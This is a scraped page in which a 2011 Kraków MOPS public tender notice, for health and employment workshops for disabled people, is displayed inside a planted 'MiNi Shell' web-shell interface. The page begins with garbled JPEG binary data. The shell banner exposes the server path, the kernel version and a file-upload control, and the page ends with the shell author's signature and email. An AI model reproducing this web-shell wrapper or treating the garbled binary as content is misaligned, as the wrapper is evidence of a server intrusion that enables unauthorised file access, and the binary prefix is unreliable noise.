JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/338695-N-2011.html

<p class="kh_header"><b>Kraków: Przeprowadzenie warsztatów  dotyczących edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 338695 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów  dotyczących edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie warsztatów  dotyczących edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych, zgodnie z poniższymi wytycznymi:

1.	Ilość uczestników: 24 beneficjentów projektu Pora na aktywność (osoby niepełnosprawne posiadające lekki, umiarkowany stopień niepełnosprawności ze wskazaniami do pracy, częściowa niezdolność do pracy, całkowita niezdolność do pracy).
2.	Sposób organizacji zajęć:
1)	21 godzin zegarowych (dla każdej grupy) warsztatów odbywających się w  2  grupach po nie więcej niż 15 osób oraz 2 spotkania indywidualne po 1 godzinie zegarowej dla każdego beneficjenta,
2)	Po każdej godzinie zegarowej zajęć  nastąpi 10 minutowa przerwa.
3.	Tematyka zajęć  (ilości godzin podane na 1 grupę) 
1)	z zakresu kompetencji i umiejętności  społecznych dla każdej grupy:
a)	1 spotkanie trwające 3 godziny zegarowe z psychologiem, który przedstawi beneficjentom metody działania i techniki radzenia sobie w sytuacjach trudnych i stresujących, np.: sposoby przeciwdziałania tremie związanej z wystąpieniami publicznymi na przykładzie rozmów kwalifikacyjnych, organizacja dnia codziennego po podjęciu pracy zawodowej, omówi techniki relaksacyjne,
b)	1 spotkanie trwające  2 godziny zegarowe z psychologiem, który przedstawi techniki automotywacji i wartości pracy w życiu człowieka i konsekwencji psychicznych oraz społecznych braku pracy,
2) z zakresu edukacji i promocji zdrowia dla każdej grupy:
a)	1 spotkanie trwające  2 godz. zegarowe z lekarzem medycyny, który udzieli porad w ramach swoich kompetencji; wykaże zależność dobrej kondycji fizycznej od systematycznego leczenia i rehabilitacji, przeprowadzi zajęcia zmieniające przekonanie, iż niepełnosprawność wyklucza aktywność zawodową,  odpowie na pytania beneficjentów dot. wpływu ich niepełnosprawności na aktywność zawodową,
b)	1 spotkanie trwające 1 godz. zegarową z lekarzem okulistą, który udzieli porad w ramach swoich kompetencji; poinformuje jak należy dbać o wzrok przy poszczególnych wadach wzroku, omówi profilaktykę okulistyczną w zakresie czynników wpływających na wystąpienie wad wzroku oraz chorób oczu, odpowie na zadane pytania beneficjentów,
c)	1 spotkanie trwające 1 godz. zegarową z lekarzem kardiologiem, który udzieli porad w ramach swoich kompetencji; poinformuje jak przeciwdziałać chorobom serca, utrzymać dobrą kondycję fizyczną chorując na schorzenia kardiologiczne,  rozpoznać objawy zawału i jak postępować w przypadku jego wystąpienia, odpowie na zadane pytania beneficjentów,
d)	1 spotkanie trwające 3 godziny zegarowe z dietetykiem, który omówi prawidłowe żywienie jako sposób na utrzymanie dobrego zdrowia i kondycji, zachowanie estetyki przygotowania i spożywania posiłków, higienę odżywania, wspólne z beneficjentami przygotuje kilka przykładowych jadłospisów uwzględniających ich możliwości  finansowe,
e)	1 spotkanie trwające 4 godziny zegarowe ( 2 godziny zegarowe zajęć wykładowych i 2 godziny zegarowe zajęć praktycznych na sali gimnastycznej lub w basenie) z rehabilitantem z zakresu podwyższenia sprawności fizycznej beneficjentów, wpływu samopoczucia fizycznego na funkcjonowanie społeczne i zawodowe, rehabilitant podczas zajęć zaprezentuje proste ćwiczenia usprawniające fizycznie dla różnych typów niepełnosprawności oraz przedstawi przykładowy instruktaż ćwiczeń do wykonywania w domu, 
3) z zakresu aktywizacji zawodowej w tym:
a)	1 spotkanie po 2 godziny zegarowe z doradcą zawodowym dla osób niepełnosprawnych, który omówi nowoczesne formy zatrudnienia ( praca zdalna, telepraca, praca na wezwanie itp.) przekaże informacje na temat dotacji i refundacji PFRON (dotyczących rehabilitacji zawodowej), możliwość zatrudnienia na otwartym rynku pracy i możliwość zatrudnienia wspieranego osoby niepełnosprawnej (np. spółdzielnie socjalne, zakłady aktywności zawodowej, ZPCh), założenia własnej działalności gospodarczej,
b)	2 spotkania po 1 godzinie zegarowej - porady indywidualne z doradcą zawodowym dla osób niepełnosprawnych, który dokona analizy uczestników pod kątem określenia predyspozycji zawodowych każdej osoby, udzieli porad indywidualnych z zakresu zatrudnienia osoby niepełnosprawnej, ograniczeń i możliwości na rynku pracy dla danego beneficjenta, opracuje z beneficjentem dokumenty aplikacyjne, przygotuje klienta do rozmowy kwalifikacyjnej, opracuje wytyczne dotyczące dalszej pracy pracownika socjalnego z każdym beneficjentem.
c)	1 spotkanie trwające 2 godziny zegarowe z prawnikiem, który omówi podstawowe zagadnienia z prawa pracy oraz zatrudnienia osób niepełnosprawnych, różnice pomiędzy umową o pracę, umową zlecenie oraz umową o dzieło, odpowie na zadane pytania beneficjentów.
4.	Celem warsztatów jest:
1)	 zmiana nastawienia osób niepełnosprawnych do własnej aktywności zawodowej, 
2)	poprawa kondycji psychofizycznej osób niepełnosprawnych, 
3)	podniesienie poziomu wiedzy o sposobach zapobiegania chorobom,
4)	uświadomienie znaczenia systematycznej kontroli stanu zdrowia.
5.	Efekty uczestnictwa w warsztatach:
1)	beneficjent będzie potrafił zastosować poznane techniki radzenia sobie w trudnych sytuacjach oraz dostosować techniki asertywne do konkretnej sytuacji życiowej,
2)	beneficjent będzie miał świadomość, że jego stan zdrowia nie wyklucza go z aktywności zawodowej,
3)	beneficjent będzie umiał określić jaki zawód może wykonywać w związku ze swoimi ograniczeniami wynikającymi z niepełnosprawności,
4)	beneficjent będzie miał świadomość, że jego sprawność fizyczna zależy od systematycznego leczenia i rehabilitacji,
5)	beneficjent będzie potrafił przygotować dokumenty aplikacyjne i zaprezentować się na rozmowie kwalifikacyjnej,
6)	beneficjent będzie potrafił dostosować dietę do swojego stanu zdrowia z uwzględnieniem własnych możliwości finansowych,
7)	beneficjent będzie znał swoje prawa i uprawnienia jako osoba niepełnosprawna w miejscu zatrudnienia.
6.	Wykonawca zobowiązuje się do:
1)	zapewnienia temperatury pokojowej w pomieszczeniach szkoleniowych.
2)	oznaczenia dokumentów wytworzonych w związku z realizacją przedmiotu zamówienia, materiałów, sal w których odbywać się będą zajęcia itp. zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (http://www.efs.gov.pl/Documents/wytyczne_04_02.pdf),
3)	wydania uczestnikom zaświadczeń oznakowanych wg w/w wytycznych,
4)	zachowania w tajemnicy wszelkich danych osobowych, do których uzyskał dostęp w związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy o ochronie danych osobowych.
5)	prowadzenia: 
a)	dziennika każdych zajęć zawierającego: listę obecności, wymiar godzin, tematy zajęć, 
b)	list potwierdzonych własnoręcznym podpisem uczestnika odbioru materiałów piśmienniczych, publikacji oraz wyżywienia,
c)	dokumentacji fotograficznej prezentującej całokształt usługi i przekazania jej na zakończenie całej usługi Zamawiającemu.
d)	Sporządzenia  i przedstawienia na zakończenie usługi Zamawiającemu  opinii/indywidualnego planu działania sporządzonego przez doradcę zawodowego dla każdego uczestnika  
6)	informowania Zamawiającego o nieobecnościach uczestników na zajęciach lub rezygnacji z udziału.
7)	 zapewnienia materiałów szkoleniowych dla każdego uczestnika:
a)	planu zajęć,
b)	długopisu metalowego typu Zenit,
c)	bloku biurowego 60 stron kratka A4,
d)	skryptu zajęć dla każdego uczestnika zawierający materiał omawiany na zajęciach, wskazówki, porady (materiały dydaktyczne i publikacje o łącznej objętości minimalnie 50 stron ilustrowane dostosowane do  potrzeb uczestników, w tym co najmniej:
przykładowy list motywacyjny, 
CV,
wykaz instytucji dofinansowujących rozpoczęcie własnej działalności gospodarczej, 
adresy portali internetowych związanych z poszukiwaniem pracy dla osób niepełnosprawnych, 
przykładowe jadłospisy uwzględniające kaloryczność potraw oraz obliczone wartości energetyczne posiłku na poczet wartości odżywczych, 
instruktaż ćwiczeń.
8)	przedstawienia na 10 dni roboczych przed rozpoczęciem zajęć harmonogramu warsztatów do zaakceptowania przez Zamawiającego, zawierającego tematykę poszczególnych zajęć Harmonogram będzie podlegał akceptacji Kierownika Sekcji ds. Zarządzania Projektem Systemowym. W harmonogramie Wykonawca określi kiedy (data, godzina) i gdzie (dokładny adres) będą się odbywały poszczególne zajęcia,
7.	Wykonawca zapewni beneficjentom poczęstunek wg poniższego menu: (ilości podane na 1 osobę):
Przerwy kawowe podczas warsztatów (w każdy dzień zajęć): herbata 300 ml, kawa 100 ml, mleko do kawy 50 ml, woda niegazowana 250 ml, woda gazowana 250 ml, soki owocowe 100 % (2 różne rodzaje) 250 ml, paluszki, kruche ciastka kilka rodzajów 75g. 
8.	Wykonawca zapewni odpowiedni do przeprowadzenia warsztatów lokal, pozbawiony barier architektonicznych,  usytuowany w granicach administracyjnych Krakowa, nie dalej niż 1 km od najbliższego przystanku komunikacji zbiorowej 
9.	Pozostałe ustalenia:
1)	Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez Zamawiającego lub podmiot kontrolujący Zamawiającego.
2)	W przypadku gdy beneficjent zrezygnuje z uczestnictwa w warsztatach w trakcie ich realizacji Zamawiający zapłaci Wykonawcy wyłącznie wynagrodzenie należne z tytułu wykonania części zamówienia tj. faktycznie przeprowadzonych godzin warsztatów. 
3)	W przypadku gdy beneficjent zrezygnuje z uczestnictwa w zajęciach  przed ich rozpoczęciem, Wykonawcy nie będzie przysługiwało jakiekolwiek wynagrodzenie.
4)	W terminie 5 dni roboczych od daty zakończenia usługi Wykonawca zorganizuje w zasobach lokalowych Zamawiającego spotkanie podsumowujące,  podczas którego przekaże Zamawiającemu zgromadzoną dokumentację, o której mowa w ust. 6 pkt 3 i 5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować następującymi osobami zdolnymi do wykonania zamówienia, tj.:
1)	1 osobą z wykształceniem wyższym psychologicznym 
2)	1 osobą  posiadającą kwalifikacje zawodowe doradcy zawodowego zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 20 października 2004 r. w sprawie trybu nadawania licencji zawodowych pośrednika pracy i doradcy zawodowego lub która ukończyła studia podyplomowe z zakresu doradztwa zawodowego
3)	1 osobą  posiadającą wykształcenie wyższe medyczne ze specjalizacją kardiolog oraz aktualny wpis na listę prowadzoną przez Okręgową Izbę Lekarską.
4)	1 osobą  posiadającą wykształcenie wyższe medyczne ze specjalizacją okulista oraz aktualny wpis na listę  prowadzoną przez Okręgową Izbę Lekarską. 
5)	1 osobą  posiadającą wykształcenie wyższe medyczne ze specjalizacją chorób wewnętrznych oraz aktualny wpis na listę  prowadzoną przez Okręgową Izbę Lekarską.
6)	1 osobą posiadającą wykształcenie wyższe na kierunku fizjoterapia 
7)	1 osoba posiadającą wykształcenie w zakresie dietetyki .
8)	1 osobą posiadającą wykształcenie wyższe prawnicze.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak:
1)	termin realizacji zamówienia, 
2)	miejsce realizacji zamówienia,
3)	warunki płatności,
4)	zmniejszenia liczby uczestników,
5)	podwykonawcy oraz zakres przedmiotu umowy im powierzony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=30232<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 08:00, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany ze środków UE w ramach projektu Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com